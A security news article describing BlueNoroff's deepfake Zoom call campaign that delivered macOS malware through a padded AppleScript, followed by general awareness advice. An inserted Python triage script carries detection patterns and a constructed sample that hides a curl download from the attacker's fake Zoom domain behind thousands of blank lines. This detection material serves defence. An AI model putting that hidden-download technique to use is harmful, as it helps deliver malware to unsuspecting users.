A group of hackers linked to North Korea, known as BlueNoroff, has taken its deception tactics to another level: they are posing as company executives during Zoom video calls. The goal? To trick employees into unknowingly installing malware designed specifically for Mac computers.
BlueNoroff (also called Sapphire Sleet or TA444) is a group of cybercriminals well known for their well-planned attacks, especially those targeting the cryptocurrency world. Over time, they have developed malware for both Windows and macOS, and are now using that expertise to launch more sophisticated attacks.
One of their most recent moves was detected on June 11, 2025, when a possible intrusion into a company's network was identified. Everything points to the target, once again, being to steal cryptocurrencies, a strategy they have already used in previous attacks and which coincides with reports from other security firms such as SentinelLabs, Microsoft, Jamf, and Kaspersky.
It all started when an employee at a tech company received a message on Telegram. The person who contacted him was posing as an external professional asking to schedule a meeting. Nothing out of the ordinary... at least at first.
The message included a Calendly link that, in theory, was for a Google Meet session. But when clicked, the link redirected to a page that looked like Zoom, but was actually a fake domain controlled by the attackers.
This technique is not new. Something similar had already been seen in April in a campaign attributed to a North Korean hacker group known as Elusive Comet.
When the employee connected to the supposed meeting, everything seemed legitimate. The video call included what appeared to be high-ranking executives from his own company (or at least very credible versions created with deepfakes) and also some “external participants” who reinforced the feeling that it was something serious and real.
But in the middle of the conversation, the employee had problems with his microphone, which was not working. The “executives” (also deepfakes) suggested that he download a Zoom extension to fix the technical glitch.
The link was sent directly to him via Telegram, leading him to download a file with an innocent name: zoom_sdk_support.scpt. What it actually contained was a malicious script in AppleScript, designed to compromise his Mac computer.
Malicious AppleScript script to fix microphone problems
Once the victim runs the malicious file, everything seems normal at first. A legitimate Zoom SDK page opens, so as not to arouse suspicion. But what's really going on behind the scenes is much more worrying.
Buried after thousands of blank lines of padding (more than 10,000 of them), the script executes a hidden command that downloads another piece of malware from a fake website that mimics Zoom: support.us05webzoom.biz. From there, a second malicious payload is downloaded and executed on the victim's computer.
When researchers sprang into action to review the incident, the domain was no longer serving the file, but they managed to find a copy on VirusTotal that helped them understand how it all worked.
The first thing the script does is disable the command history so that no traces remain. It then checks whether the Mac has Rosetta 2 installed, a piece of software that allows apps designed for Intel processors to run on new Macs with Apple Silicon chips. If it is not installed, it automatically installs it, without asking for permission, so that it can run the rest of the malware without any problems.
Next, it creates a hidden file called .pwd (the dot at the beginning makes it invisible to the user) and downloads another part of the malicious code to a temporary system folder, named icloud_helper. And that's just the beginning.
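The behaviour described above (a long run of blank-line padding hiding a download command, the fake Zoom domain, the hidden .pwd file, the icloud_helper drop, the history and Rosetta 2 steps) lends itself to a simple triage check. The following is an added example, not code from the article or from Huntress; the padding threshold, the HISTFILE pattern and the `softwareupdate --install-rosetta` pattern are my assumptions about how such a script is typically written, and the sample script is constructed.

```python
import re
from dataclasses import dataclass, field

# Indicators named in the write-up above; the threshold is a constructed choice.
FAKE_DOMAIN = "support.us05webzoom.biz"
PADDING_THRESHOLD = 1000  # flag any run of blank lines at least this long
SUSPICIOUS_PATTERNS = {
    "fake_zoom_domain": re.compile(re.escape(FAKE_DOMAIN)),
    "hidden_pwd_file": re.compile(r"/\.pwd\b"),
    "icloud_helper_drop": re.compile(r"icloud_helper"),
    "history_disabled": re.compile(r"HISTFILE|set \+o history"),  # assumed technique
    "rosetta_install": re.compile(r"softwareupdate\s+--install-rosetta"),  # assumed
    "shell_download": re.compile(r"do shell script.*\b(curl|wget)\b"),
}

@dataclass
class Verdict:
    max_blank_run: int
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.max_blank_run >= PADDING_THRESHOLD or bool(self.hits)

def longest_blank_run(lines):
    """Length of the longest run of consecutive whitespace-only lines."""
    best = run = 0
    for line in lines:
        run = run + 1 if not line.strip() else 0
        best = max(best, run)
    return best

def triage_applescript(text: str) -> Verdict:
    """Score decompiled/plain AppleScript text for the indicators above."""
    verdict = Verdict(max_blank_run=longest_blank_run(text.splitlines()))
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        if pattern.search(text):
            verdict.hits.append(name)
    return verdict

# Constructed sample mimicking the described layout: an innocent-looking page
# open, 10,000 blank lines, then a hidden download-and-execute command.
SAMPLE = (
    'open location "https://example.invalid/zoom-sdk"\n'
    + "\n" * 10000
    + 'do shell script "curl -s https://support.us05webzoom.biz/x -o /tmp/icloud_helper"\n'
)

if __name__ == "__main__":
    print(triage_applescript(SAMPLE))
```

Run it against a plain-text export of a .scpt file (for compiled scripts, `osadecompile` on macOS produces the text form).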
Huntress researchers discovered at least eight different malicious files on the compromised computer. Some were small, but others were designed to take complete control of the system. Here are the most important ones:
This attack shows how sophisticated cybercriminals have become, especially groups like BlueNoroff, which not only create malware for Mac (still relatively rare), but now combine it with social engineering using deepfakes in video calls.
In addition, there is a false sense of security among many Mac users. It is often thought that Apple computers are “more secure” and that malware is a Windows thing. But that is changing fast.
With the growth of macOS use in corporate environments, hackers are adapting their attacks to this system. It is no longer just generic malware or petty theft. We are seeing well-planned campaigns, with complex tools targeting specific sectors, such as cryptocurrencies or technology companies.
No one is 100% safe, not even Mac users.
Be wary of any strange links or unusual requests, even if they appear to come from someone in authority.
Video calls do not guarantee that the person on the other end is real. With deepfakes, everything can be a well-staged performance.
Companies must educate their employees and keep their systems up to date and protected with the right tools to detect suspicious behavior, not just dangerous files.
While this attack may seem like something out of a movie, it is completely real. And what's most concerning is that these types of techniques are not going away... they are only going to become more common. Do you use Mac in your business or to manage cryptocurrencies? Now is the time to strengthen your security.